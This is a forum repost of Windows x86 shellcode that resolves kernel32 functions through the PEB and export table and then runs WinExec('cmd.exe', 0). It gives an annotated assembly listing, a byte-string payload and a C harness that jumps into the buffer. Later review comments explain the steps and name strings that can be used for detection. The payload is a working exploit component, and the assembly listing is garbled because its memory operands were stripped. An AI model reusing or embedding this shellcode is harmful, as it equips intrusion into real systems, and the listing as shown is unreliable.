90_ 发表于 2016-6-8 09:28:28

Windows/x86 WinExec("cmd.exe",0) Shellcode

/*
   # Title : Windows x86 WinExec("cmd.exe",0) shellcode
   # Date : 07/06/2016
   # Author : Roziul Hasan Khan Shifat
   # Tested On : Windows 7 Professional x86
*/
  
/*
To Compile:
--------------
  
$nasm -f win32 winexec.asm -o exec.obj
  
  
Linking:
----------
$ "C:\Program Files\CodeBlocks\MinGW\bin\ld.exe" -o winexec.exe exec.obj
  
  
*/
  
/*
  
section .text
    global _start
_start:
  
;-----------------------------------------------------------------------
; Self-contained Windows x86 shellcode: WinExec("cmd.exe", 0) followed by
; ExitProcess(0). It declares no imports: kernel32.dll is located through
; the PEB loader module list, and GetProcAddress is found by scanning
; kernel32's export name table for "GetProcAddress" (compared as the
; three dwords "GetP", "rocA", "ddre"). The remaining API addresses are
; then resolved by calling GetProcAddress with names built on the stack.
;
; NOTE(review): the memory operands of the `mov` / `cmp` instructions
; below (everything that was originally written in square brackets) were
; stripped when this listing was posted, so the text does not assemble
; as shown. The byte array in the C file below is the assembled form.
;
; Register roles, as stated by the per-line comments:
;   ebx = kernel32.dll base address
;   edx = GetProcAddress (copied to esi before the first call)
;   edi = kernel32.dll base, later WinExec
;   esi = GetProcAddress, later ExitProcess
;
; Detection note: every string the code needs ("GetP"/"rocA"/"ddre",
; "WinExec", "ExitProcess", "cmd.exe") is embedded as an immediate, so
; these fragments appear in plaintext in the assembled bytes.
;-----------------------------------------------------------------------
  
;Finding base address of kernel32.dll
  
xor ecx,ecx
mov eax, ;loading PEB(Process Environment Block) in Eax
mov eax, ;Eax=PEB->Ldr
mov esi, ;Esi=PEB->Ldr.InMemOrderModuleList
lodsd ;Eax=second module of InMemOrderModuleList (ntdll.dll)
xchg eax,esi ;Eax=Esi ,Esi=Eax
lodsd ;Eax=third module of InMemOrderModuleList (kernel32.dll)
mov ebx, ;Ebx=base Address of Kernel32.dll (PVOID Dllbase)
  
;-------------------------------------------------------------------------------------------------------
  
  
  
;Finding Export table of Kernel32.dll
  
mov edx, ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+base address of kernel32.dll)=PE Header
mov edx, ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ; (DataDirectory->VirtualAddress+kernel32.dll base address)=Export table of kernel32.dll (IMAGE_EXPORT_DIRECTORY)
mov esi, ;(IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ; ESI=(AddressOfNames+kernel32.dll base address)=kernel32.dll AddressOfNames
xor ecx,ecx ;ecx = index into AddressOfNames, counts up in the loop below
  
;--------------------------------------------------------------------------------------------------------------
  
  
;finding GetProcAddress function name
;Loop invariant: esi points at the next AddressOfNames entry, ecx = number of names examined so far.
;A mismatch on any of the three dwords goes back to the top; falling through means the name matched.
  
Get_func:
  
inc ecx ;Incrementing the Ordinal
lodsd ;Get name Offset
add eax,ebx ;(name offset+kernel32.dll base address)=Get Function name
cmp dword ,0x50746547 ;GetP
jnz Get_func
cmp dword ,0x41636f72 ; rocA
jnz Get_func
cmp dword ,0x65726464 ; ddre
jnz Get_func
  
;-----------------------------------------------------------------------------------------------------------
  
  
  
;finding the address of GetProcAddress
  
mov esi, ;Esi=(IMAGE_EXPORT_DIRECTORY+0x24)=AddressOfNameOrdinals
add esi,ebx ;(AddressOfNameOrdinals+base address of kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx, ;CX=Number of Function
;NOTE(review): the comment above says "Number of Function"; given the dec ecx that follows and the
;AddressOfNameOrdinals load just before, this appears to be the ordinal of the matched name rather than
;a count - confirm against the assembled bytes.
dec ecx
mov esi, ;(IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx, ;EDX=Pointer(offset)
add edx,ebx ;Edx=Address of GetProcAddress
  
;-------------------------------------------------------------------------------------------------------
  
;backing up address of GetProcAddress because EAX,EBX,EDX,ECX Register value will be changed after calling function
xor esi,esi
push edx
pop esi
  
;----------------------------------------
  
;backing up kernel32.dll base address
xor edi,edi
push ebx
pop edi
  
;------------------------
;Finding address of WinExec()
;The name is built on the stack as a NUL-terminated string ("WinE", "xec\0") and ecx points at it.
xor ecx,ecx
push ecx
push 0x00636578
push 0x456e6957
  
mov ecx,esp
  
push ecx ;lpProcName
push ebx ;hModule = kernel32.dll
  
call edx ;GetProcAddress(kernel32, "WinExec")
;-----------------------
;finding address of ExitProcess
;Same stack-string technique: "Exit", "Proc", "ess\0".
xor ecx,ecx
push ecx
push 0x00737365
push 0x636f7250
push 0x74697845
  
mov ecx,esp
  
push ecx ;lpProcName
push edi ;hModule = kernel32.dll (saved copy)
  
xor edi,edi
mov edi,eax ;address of WinExec
  
call esi ;GetProcAddress(kernel32, "ExitProcess")
  
;---------------
  
xor esi,esi
push eax
pop esi ;address of ExitProcess
;-------------------
;calling winexec
;Command line built on the stack: "cmd.", "exe\0".
xor ecx,ecx
push ecx
push 0x00657865
push 0x2e646d63
  
mov ecx,esp
  
push 0 ;uCmdShow = 0 (pushed last-argument first, stdcall)
push ecx ;lpCmdLine
  
call edi ;WinExec("cmd.exe", 0)
  
;--------------
;exiting
push 0 ;uExitCode = 0
call esi ;ExitProcess(0) - does not return
  
*/
  
  
  
  
  
  
#include<stdio.h>
  
/*
 * Assembled bytes of the listing above, kept as a NUL-terminated string
 * in a writable, non-const global array.
 *
 * NOTE(review): the bytes following "\x6a\x00\xff\xd6" (the final
 * `push 0 / call esi`) do not correspond to any instruction in the
 * listing above and look like trailing padding; confirm before relying
 * on sizeof(shellcode) as the code length. The array size also includes
 * the implicit string terminator.
 *
 * Detection note: the API-name fragments ("GetP", "rocA", "ddre",
 * "WinE"/"xec", "Exit"/"Proc"/"ess") and the command string
 * ("cmd."/"exe") are embedded as immediates and are visible in
 * plaintext in these bytes.
 */
char shellcode[]=\
  
"\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x52\x5e\x31\xff\x53\x5f\x31\xc9\x51\x68\x78\x65\x63\x00\x68\x57\x69\x6e\x45\x89\xe1\x51\x53\xff\xd2\x31\xc9\x51\x68\x65\x73\x73\x00\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\xe1\x51\x57\x31\xff\x89\xc7\xff\xd6\x31\xf6\x50\x5e\x31\xc9\x51\x68\x65\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x00\x51\xff\xd7\x6a\x00\xff\xd6\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00";
  
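/*
 * Test harness: transfers control to the `shellcode` buffer.
 *
 * `main` now has an explicit return type and returns 0; the original
 * implicit-int `main()` is not valid C99 or later. The call itself is
 * unchanged. Note that `shellcode` is a writable data array: on a build
 * where data pages are non-executable (DEP/NX) the call below raises an
 * access violation instead of executing the bytes. The bytes themselves
 * end in ExitProcess, so on success this function never returns.
 */
int main(void)
{
    /* Treat the buffer as a function taking no arguments and jump to it. */
    void (*entry)(void) = (void (*)(void)) shellcode;
    entry();
    return 0;
}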
